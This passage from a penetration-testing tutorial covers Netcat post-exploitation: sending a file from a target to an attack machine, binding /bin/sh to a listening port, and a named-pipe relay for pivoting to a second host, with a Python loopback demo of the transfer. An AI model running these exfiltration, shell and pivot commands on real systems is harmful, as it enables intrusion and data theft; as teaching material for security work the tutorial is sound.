Netcat is a command-line utility used to read from or write to TCP, UDP, or Unix domain socket network connections. Highly versatile, it has been called the "Swiss Army knife" of hacking tools. It can create or connect to a TCP server, act as a simple proxy or relay, transfer files, launch executables (such as the backdoor shells mentioned previously) when a connection is made, test services and daemons, and even port scan. Netcat has been ported to most desktop platforms and has inspired similar tools such as Ncat and Simple Netcat for Android.
The basic syntax of Netcat is nc [options] [target address] [port(s)]. Common options include the following.
In addition to the standard bind and reverse shell commands mentioned previously, you can use Netcat for other post-exploitation tasks, such as moving files between hosts. For example, let's say you want to exfiltrate a file called data.txt from a target system onto your attack machine (192.168.1.10 in the examples that follow). The process is similar to setting up a reverse shell. On the attack machine, set up a listener and redirect whatever it receives into a file:
nc -lp 12345 > data.txt
Then, on the target machine, start the connection and pass in the file:
nc 192.168.1.10 12345 < data.txt
Your listener will receive the file and save it. Two caveats apply. The listener only knows the transfer is complete when the connection closes, so the sending side must close once it hits end of file: the traditional Netcat needs -q 1 for this and the OpenBSD version needs -N, otherwise both ends sit waiting. And because the channel is unencrypted and unauthenticated (anything that can reach the port can connect and overwrite data.txt), compare a hash of the file on both ends, for example with sha256sum, before trusting the copy.
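The transfer above, re-created on a single machine as an added example (this is illustration code, not part of the original page or of Netcat itself). Loopback addresses and OS-chosen ports stand in for 192.168.1.10:12345, and the file contents are constructed. It shows the two points that matter in practice: the receiver finishes only when the sender closes its side, and both ends compute a hash so the copy can be verified.

```python
"""Loopback re-creation of `nc -lp 12345 > data.txt` (receiver) and
`nc 192.168.1.10 12345 < data.txt` (sender), with a hash check on both ends.
Added illustration; the hosts, ports and sample data are assumptions for the demo."""
import hashlib
import os
import socket
import tempfile
import threading


def receive_file(listener: socket.socket, dest: str) -> str:
    """Attack-machine side: accept one connection and write everything received
    to dest. Returns the SHA-256 of the bytes that landed."""
    conn, _ = listener.accept()
    listener.close()
    digest = hashlib.sha256()
    with conn, open(dest, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:  # only a closed connection marks the end of the file
                break
            out.write(chunk)
            digest.update(chunk)
    return digest.hexdigest()


def send_file(addr, src: str) -> str:
    """Target side: connect, stream the file, then close the write half.
    Returns the SHA-256 of the bytes that were sent."""
    digest = hashlib.sha256()
    with socket.create_connection(addr) as sock, open(src, "rb") as inp:
        for chunk in iter(lambda: inp.read(65536), b""):
            sock.sendall(chunk)
            digest.update(chunk)
        # This is what `nc -q 1` / `nc -N` do on EOF; without it the receiver waits forever.
        sock.shutdown(socket.SHUT_WR)
    return digest.hexdigest()


def exfil_demo(payload: bytes = b"constructed sample data\n" * 1000) -> tuple:
    """Run both ends on 127.0.0.1 and return (sent_hash, received_hash)."""
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "data.txt")        # file on the "target"
    dest = os.path.join(workdir, "received.txt")   # where the "attack machine" stores it
    with open(src, "wb") as f:
        f.write(payload)

    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick, stands in for 12345
    listener.listen(1)

    result = {}
    receiver = threading.Thread(target=lambda: result.update(received=receive_file(listener, dest)))
    receiver.start()
    sent = send_file(listener.getsockname(), src)
    receiver.join()
    return sent, result["received"]


if __name__ == "__main__":
    sent_hash, received_hash = exfil_demo()
    print("sent    ", sent_hash)
    print("received", received_hash)
    print("match" if sent_hash == received_hash else "MISMATCH")
```

Running the module prints the two hashes; with real Netcat you get the same assurance by running a hash tool over data.txt on each host and comparing the output by eye.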
You can also use Netcat to create a relay using a Linux named pipe. In this example the initial target host connects back to a listener on port 12345 of your attack machine and forwards everything you type to a shell bound on port 54321 of a second target host (192.168.1.100), returning the shell's output over the same path. First, start a listener on your attack machine:
nc -lp 12345
Then, start a listener on the second target host that binds a shell (as noted earlier, -e is available in the traditional Netcat and in Ncat, but not in the OpenBSD rewrite):
nc -lp 54321 -e /bin/sh
On the initial target host, create a named pipe and set up the relay:
mknod backpipe p
nc 192.168.1.10 12345 0<backpipe | nc 192.168.1.100 54321 | tee backpipe
The first nc connects back to your attack machine and takes its input from the named pipe. Whatever you type arrives on that nc's standard output and is piped into the second nc, which delivers it to the bound shell on 192.168.1.100. The shell's output comes back on the second nc's standard output, and tee writes it both to the terminal on the initial target host and into backpipe, where the first nc reads it and sends it to you. Any commands issued from your attack machine are therefore relayed through the initial target host and executed on the second target host. Relaying data like this lets you pivot deeper into a network, and from the second target's point of view the connection originates from the initial target host rather than from your attack machine. The relay lasts for one session: when either side closes, the pipeline exits, so remove backpipe afterwards if you do not want to leave it behind.
Note: For additional Netcat examples, see the SANS Netcat Cheat Sheet at https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf